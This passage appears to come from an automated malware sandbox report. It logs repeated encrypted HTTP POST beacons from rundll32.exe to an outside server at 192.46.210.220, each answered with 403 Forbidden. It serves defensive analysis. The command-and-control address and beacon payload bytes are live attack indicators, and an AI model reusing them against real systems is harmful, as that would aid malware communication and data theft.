                                                                                                        2021-10-28 02:51:52 UTC134OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:53 UTC143INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.549871192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:53 UTC139OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:53 UTC139OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:53 UTC144INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.549879192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:56 UTC144OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:56 UTC144OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:57 UTC153INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.549764192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:05 UTC14OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:05 UTC15OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:05 UTC19INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:05 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.549880192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:57 UTC149OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:57 UTC149OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:57 UTC153INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.549888192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:00 UTC154OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:00 UTC154OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:01 UTC163INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.549889192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:00 UTC158OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:00 UTC159OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:01 UTC163INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.549896192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:04 UTC164OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:04 UTC164OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:05 UTC173INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:05 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.549897192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:04 UTC168OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:04 UTC168OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:05 UTC173INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:05 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.549904192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:08 UTC174OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:08 UTC174OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:08 UTC183INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.549905192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:08 UTC178OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:08 UTC178OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:09 UTC183INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.549912192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:12 UTC183OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:12 UTC184OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:12 UTC193INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.549913192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:12 UTC188OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:12 UTC188OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:13 UTC193INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.549920192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:15 UTC193OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
